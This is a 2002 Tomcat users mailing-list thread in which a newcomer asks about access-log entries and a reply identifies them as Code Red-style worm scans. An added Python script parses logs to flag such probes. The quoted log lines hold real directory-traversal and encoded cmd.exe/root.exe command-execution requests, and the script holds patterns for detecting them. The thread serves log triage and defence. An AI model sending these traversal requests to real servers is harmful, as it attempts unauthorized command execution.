tomcat-users mailing list archives

From "Rob A. Augustinus" <devi...@siulintao.net>
Subject RE: Tomcat log entries
Date Mon, 30 Dec 2002 08:39:41 GMT

These are typical 'code red' (afaik?) entries in your log.
Some infected server is still trying to infect your server;
not that it will be infected, but it will try for a certain
amount of times at least. You could create a valid link to
a null-sized file to handle it, which causes less load on
your system than a 404. Other than that, there's little
to be done about it (unless you can track down the admin
of that box and tell him to fix his server).

Rob

-----Original Message-----
From: Laszlo Nadai [mailto:lnadai@jnet1.com] 
Sent: Sunday, December 29, 2002 5:39
To: 'Tomcat Users List'
Subject: Tomcat log entries


I am fairly new to Tomcat, scripts, etc.
I found the following and similar entries in my access log file:

64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 624
64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 618
64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.160.45.159 - - [28/Dec/2002:15:00:18 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 624
64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 618
64.160.45.159 - - [28/Dec/2002:16:01:58 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.160.45.159 - - [28/Dec/2002:16:02:00 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.160.45.159 - - [28/Dec/2002:16:02:04 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
64.160.45.159 - - [28/Dec/2002:16:02:06 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:16:02:07 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:16:02:09 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
64.160.45.159 - - [28/Dec/2002:16:02:10 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
64.165.213.97 - - [28/Dec/2002:16:38:12 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 624
64.165.213.97 - - [28/Dec/2002:16:38:16 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 618
64.165.213.97 - - [28/Dec/2002:16:38:20 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.165.213.97 - - [28/Dec/2002:16:38:24 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648

Can someone tell me what someone else was trying to do?
Based on the log, should I change any settings in my config?

Thanks,
laszlo




--
To unsubscribe, e-mail:
<mailto:tomcat-user-unsubscribe@jakarta.apache.org>
For additional commands, e-mail:
<mailto:tomcat-user-help@jakarta.apache.org>
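
An added example, not part of either message and not Tomcat code: one way to triage an access log for the probe requests quoted in this thread, grouping them by source and counting any that were answered with a 2xx status instead of the 400/404 seen above. The function names are hypothetical; the sample holds four lines from the quoted log plus one constructed benign line (192.0.2.10).

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Access log line layout as quoted in the message above (Common Log Format).
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+$')
SHELL = re.compile(rb'(cmd|root)\.exe', re.I)   # shell names requested by the probes
OVERLONG = re.compile(rb'[\xc0\xc1]')           # bytes that never occur in valid UTF-8

def decode_fully(target, limit=3):
    """Percent-decode until stable; returns (bytes, passes). %%35%63 needs 2 passes."""
    raw, passes = target.encode("utf-8"), 0
    while passes < limit and (nxt := unquote_to_bytes(raw)) != raw:
        raw, passes = nxt, passes + 1
    return raw, passes

def classify(target):
    """Return the probe traits found in one request target."""
    raw, passes = decode_fully(target)
    checks = {
        "shell-probe": SHELL.search(raw),
        "traversal": b"../" in raw or b"..\\" in raw,
        "overlong-utf8": OVERLONG.search(raw),
        "double-encoded": passes > 1,
    }
    return {name for name, hit in checks.items() if hit}

def summarize(lines):
    """Group flagged requests by source; 'served' counts probes answered 2xx."""
    report = defaultdict(lambda: {"hits": 0, "tags": set(), "served": 0})
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue
        ip, target, status = m.groups()
        tags = classify(target)
        if tags:
            entry = report[ip]
            entry["hits"] += 1
            entry["tags"] |= tags
            entry["served"] += status.startswith("2")
    return dict(report)

SAMPLE = [  # first four lines are from the log quoted above; the last is constructed
    '64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 624',
    '64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687',
    '64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721',
    '64.165.213.97 - - [28/Dec/2002:16:38:20 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648',
    '192.0.2.10 - - [28/Dec/2002:16:40:00 -0800] "GET /index.jsp HTTP/1.0" 200 1024',
]
```

A non-zero `served` count for any source is the case worth investigating; in the quoted log every probe was rejected.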

